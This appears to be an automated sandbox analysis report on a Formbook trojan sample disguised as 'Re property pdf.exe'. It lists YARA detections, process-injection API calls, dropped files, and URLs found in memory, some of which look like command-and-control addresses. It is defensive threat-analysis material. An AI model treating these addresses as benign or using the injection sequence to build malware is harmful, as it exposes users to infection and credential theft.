            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: Re property pdf.exe, 00000000.00000002.1790854732.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, hwOHPmqcegxcxb.exe, 00000007.00000002.2009081564.0000000002D97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4215060092.00000000059B9000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.jsninja.net
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4215060092.00000000059B9000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.jsninja.net/a57a/
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
            Source: Re property pdf.exe, 00000000.00000002.1794226232.0000000005664000.00000004.00000020.00020000.00000000.sdmp, Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4213103511.0000000003D8A000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000011.00000002.4215978821.0000000005A8A000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4213103511.0000000004240000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000011.00000002.4215978821.0000000005F40000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4213103511.00000000043D2000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000011.00000002.4215978821.00000000060D2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mothersalwaysright.com/9ect/?2BWDG=U/rZoA1baL0SL

            E-Banking Fraud

            Source: Yara match File source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 0_2_07724C88 NtUnmapViewOfSection
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 0_2_07724C80 NtUnmapViewOfSection
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_0042C233 NtClose
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042B60 NtClose,LdrInitializeThunk
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_010435C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01044340 NtSetContextThread
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01044650 NtSuspendThread
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042B80 NtQueryInformationFile
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042BA0 NtEnumerateValueKey
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042BE0 NtQueryValueKey
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042BF0 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042AB0 NtWaitForSingleObject
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042AD0 NtReadFile
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042AF0 NtWriteFile
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042D00 NtSetInformationFile
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042D10 NtMapViewOfSection
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042D30 NtUnmapViewOfSection
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042DB0 NtEnumerateKey
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042DD0 NtDelayExecution
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042C00 NtQueryInformationProcess
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042C60 NtCreateKey
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042CA0 NtQueryInformationToken
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042CC0 NtQueryVirtualMemory
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042CF0 NtOpenProcess
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042F30 NtCreateSection
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042F60 NtCreateProcessEx
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042F90 NtProtectVirtualMemory
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042FA0 NtQuerySection
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042FB0 NtResumeThread
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042FE0 NtCreateFile
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042E30 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042E80 NtReadVirtualMemory
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042EA0 NtAdjustPrivilegesToken
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01042EE0 NtQueueApcThread
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01043010 NtOpenDirectoryObject
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01043090 NtSetValueKey
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_010439B0 NtGetContextThread
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01043D10 NtOpenProcessToken
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_01043D70 NtOpenThread
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182053512_2_01820535
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0181C7C012_2_0181C7C0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0184475012_2_01844750
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182077012_2_01820770
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183C6E012_2_0183C6E0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018229A012_2_018229A0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183696212_2_01836962
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0185889012_2_01858890
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018068B812_2_018068B8
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0184E8F012_2_0184E8F0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182A84012_2_0182A840
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182284012_2_01822840
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0181EA8012_2_0181EA80
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01838DBF12_2_01838DBF
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01828DC012_2_01828DC0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0181ADE012_2_0181ADE0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182AD0012_2_0182AD00
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182ED7A12_2_0182ED7A
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01810CF212_2_01810CF2
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01820C0012_2_01820C00
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0189EFA012_2_0189EFA0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01812FC812_2_01812FC8
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01862F2812_2_01862F28
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01840F3012_2_01840F30
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01894F4012_2_01894F40
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01832E9012_2_01832E90
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01820E5912_2_01820E59
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182B1B012_2_0182B1B0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0185516C12_2_0185516C
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0180F17212_2_0180F172
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018233F312_2_018233F3
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0180D34C12_2_0180D34C
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018252A012_2_018252A0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183B2C012_2_0183B2C0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183D2F012_2_0183D2F0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182349712_2_01823497
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018674E012_2_018674E0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0181146012_2_01811460
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182B73012_2_0182B730
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182599012_2_01825990
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182995012_2_01829950
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183B95012_2_0183B950
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018238E012_2_018238E0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0188D80012_2_0188D800
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183FB8012_2_0183FB80
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01895BF012_2_01895BF0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0185DBF912_2_0185DBF9
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01893A6C12_2_01893A6C
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183FDC012_2_0183FDC0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01823D4012_2_01823D40
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01839C2012_2_01839C20
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01899C3212_2_01899C32
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01821F9212_2_01821F92
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01829EB012_2_01829EB0
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597655116_2_05976551
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597655A16_2_0597655A
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597ECCA16_2_0597ECCA
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597479F16_2_0597479F
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_059747FA16_2_059747FA
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597677A16_2_0597677A
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597CEAA16_2_0597CEAA
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597B61A16_2_0597B61A
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_059951DA16_2_059951DA
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: String function: 01867E54 appears 96 times
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: String function: 0188EA12 appears 36 times
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: String function: 01045130 appears 58 times
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: String function: 0108F290 appears 103 times
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: String function: 00FFB970 appears 262 times
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: String function: 0107EA12 appears 86 times
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: String function: 01057E54 appears 107 times
            Source: Re property pdf.exe, 00000000.00000002.1786169778.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs Re property pdf.exe
            Source: Re property pdf.exe, 00000000.00000002.1791759190.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameTyrone.dll8 vs Re property pdf.exe
            Source: Re property pdf.exe, 00000000.00000000.1735631909.00000000009BE000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameEEW.exe6 vs Re property pdf.exe
            Source: Re property pdf.exe, 00000000.00000002.1795716307.0000000008C00000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameTyrone.dll8 vs Re property pdf.exe
            Source: Re property pdf.exe, 00000006.00000002.2172585991.00000000010FD000.00000040.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs Re property pdf.exe
            Source: Re property pdf.exe; Binary or memory string: OriginalFilenameEEW.exe6 vs Re property pdf.exe
            Source: Re property pdf.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Re property pdf.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: hwOHPmqcegxcxb.exe.0.dr; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, weWwPlZVfk5tlcGN3Y.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, ntkhga1giMCKkUj49f.cs; Security API names: _0020.SetAccessControl
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, ntkhga1giMCKkUj49f.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, ntkhga1giMCKkUj49f.cs; Security API names: _0020.AddAccessRule
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, ntkhga1giMCKkUj49f.cs; Security API names: _0020.SetAccessControl
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, ntkhga1giMCKkUj49f.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, ntkhga1giMCKkUj49f.cs; Security API names: _0020.AddAccessRule
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, weWwPlZVfk5tlcGN3Y.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, ntkhga1giMCKkUj49f.cs; Security API names: _0020.SetAccessControl
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, ntkhga1giMCKkUj49f.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, ntkhga1giMCKkUj49f.cs; Security API names: _0020.AddAccessRule
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, weWwPlZVfk5tlcGN3Y.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@22/12@15/9
            Source: C:\Users\user\Desktop\Re property pdf.exe; File created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
            Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
